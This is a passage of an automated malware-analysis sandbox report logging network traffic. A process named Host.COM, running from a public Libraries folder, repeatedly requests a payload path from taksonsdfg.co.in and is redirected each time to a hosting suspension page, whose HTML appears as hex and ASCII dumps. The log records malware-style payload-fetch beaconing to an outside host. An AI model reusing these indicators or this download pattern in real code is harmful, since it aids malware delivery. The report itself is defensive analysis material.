                                                                  2024-11-26 08:38:59 UTC1043INData Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65
                                                                  Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
                                                                  2024-11-26 08:38:59 UTC6588INData Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                                                  Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
                                                                  2024-11-26 08:38:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  22192.168.2.749845108.170.55.2024438004C:\Users\Public\Libraries\Host.COM
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-26 08:39:01 UTC179OUTGET /MIEJOHNSONERE/190_Ovqqzpvffya HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Accept: */*
                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                  Host: taksonsdfg.co.in
                                                                  2024-11-26 08:39:01 UTC446INHTTP/1.1 302 Found
                                                                  Connection: close
                                                                  content-type: text/html
                                                                  content-length: 771
                                                                  date: Tue, 26 Nov 2024 08:39:01 GMT
                                                                  server: LiteSpeed
                                                                  cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                  location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi
                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                  2024-11-26 08:39:01 UTC771INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  23192.168.2.749851108.170.55.2024438004C:\Users\Public\Libraries\Host.COM
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-26 08:39:03 UTC175OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Accept: */*
                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                  Host: taksonsdfg.co.in
                                                                  2024-11-26 08:39:03 UTC325INHTTP/1.1 200 OK
                                                                  Connection: close
                                                                  content-type: text/html
                                                                  transfer-encoding: chunked
                                                                  date: Tue, 26 Nov 2024 08:39:03 GMT
                                                                  server: LiteSpeed
                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                  2024-11-26 08:39:03 UTC1043INData Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65
                                                                  Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
                                                                  2024-11-26 08:39:03 UTC6588INData Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                                                  Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
                                                                  2024-11-26 08:39:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  24192.168.2.749858108.170.55.2024438004C:\Users\Public\Libraries\Host.COM
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-26 08:39:05 UTC179OUTGET /MIEJOHNSONERE/190_Ovqqzpvffya HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Accept: */*
                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                  Host: taksonsdfg.co.in
                                                                  2024-11-26 08:39:06 UTC446INHTTP/1.1 302 Found
                                                                  Connection: close
                                                                  content-type: text/html
                                                                  content-length: 771
                                                                  date: Tue, 26 Nov 2024 08:39:05 GMT
                                                                  server: LiteSpeed
                                                                  cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                  location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi
                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                  2024-11-26 08:39:06 UTC771INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  25192.168.2.749866108.170.55.2024438004C:\Users\Public\Libraries\Host.COM
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-26 08:39:07 UTC175OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Accept: */*
                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                  Host: taksonsdfg.co.in
                                                                  2024-11-26 08:39:08 UTC325INHTTP/1.1 200 OK
                                                                  Connection: close
                                                                  content-type: text/html
                                                                  transfer-encoding: chunked
                                                                  date: Tue, 26 Nov 2024 08:39:07 GMT
                                                                  server: LiteSpeed
                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                  2024-11-26 08:39:08 UTC1043INData Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65
                                                                  Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
                                                                  2024-11-26 08:39:08 UTC6588INData Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                                                  Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
                                                                  2024-11-26 08:39:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  26192.168.2.749874108.170.55.2024438004C:\Users\Public\Libraries\Host.COM
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-26 08:39:09 UTC179OUTGET /MIEJOHNSONERE/190_Ovqqzpvffya HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Accept: */*
                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                  Host: taksonsdfg.co.in
                                                                  2024-11-26 08:39:10 UTC446INHTTP/1.1 302 Found
                                                                  Connection: close
                                                                  content-type: text/html
                                                                  content-length: 771
                                                                  date: Tue, 26 Nov 2024 08:39:10 GMT
                                                                  server: LiteSpeed
                                                                  cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                  location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi
                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                  2024-11-26 08:39:10 UTC771INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  27192.168.2.749879108.170.55.2024438004C:\Users\Public\Libraries\Host.COM
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-26 08:39:11 UTC175OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Accept: */*
                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                  Host: taksonsdfg.co.in
                                                                  2024-11-26 08:39:12 UTC325INHTTP/1.1 200 OK
                                                                  Connection: close
                                                                  content-type: text/html
                                                                  transfer-encoding: chunked
                                                                  date: Tue, 26 Nov 2024 08:39:12 GMT
                                                                  server: LiteSpeed
                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                  2024-11-26 08:39:12 UTC1043INData Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65
                                                                  Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
                                                                  2024-11-26 08:39:12 UTC6588INData Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                                                  Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
                                                                  2024-11-26 08:39:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  28192.168.2.749886108.170.55.2024438004C:\Users\Public\Libraries\Host.COM
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-26 08:39:14 UTC179OUTGET /MIEJOHNSONERE/190_Ovqqzpvffya HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Accept: */*
                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                  Host: taksonsdfg.co.in
                                                                  2024-11-26 08:39:14 UTC446INHTTP/1.1 302 Found
                                                                  Connection: close
                                                                  content-type: text/html
                                                                  content-length: 771
                                                                  date: Tue, 26 Nov 2024 08:39:14 GMT
                                                                  server: LiteSpeed
                                                                  cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                  location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi
                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                  2024-11-26 08:39:14 UTC771INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  29192.168.2.749890108.170.55.2024438004C:\Users\Public\Libraries\Host.COM
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-26 08:39:16 UTC175OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Accept: */*
                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                  Host: taksonsdfg.co.in
                                                                  2024-11-26 08:39:17 UTC325INHTTP/1.1 200 OK
                                                                  Connection: close
                                                                  content-type: text/html
                                                                  transfer-encoding: chunked
                                                                  date: Tue, 26 Nov 2024 08:39:16 GMT
                                                                  server: LiteSpeed
                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                  2024-11-26 08:39:17 UTC1043INData Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65
                                                                  Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
                                                                  2024-11-26 08:39:17 UTC6588INData Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                                                  Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
                                                                  2024-11-26 08:39:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  30192.168.2.749899108.170.55.2024438004C:\Users\Public\Libraries\Host.COM
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-11-26 08:39:18 UTC179OUTGET /MIEJOHNSONERE/190_Ovqqzpvffya HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Accept: */*
                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                  Host: taksonsdfg.co.in
                                                                  2024-11-26 08:39:19 UTC446INHTTP/1.1 302 Found
                                                                  Connection: close
                                                                  content-type: text/html
                                                                  content-length: 771
                                                                  date: Tue, 26 Nov 2024 08:39:19 GMT
                                                                  server: LiteSpeed
                                                                  cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                  location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi
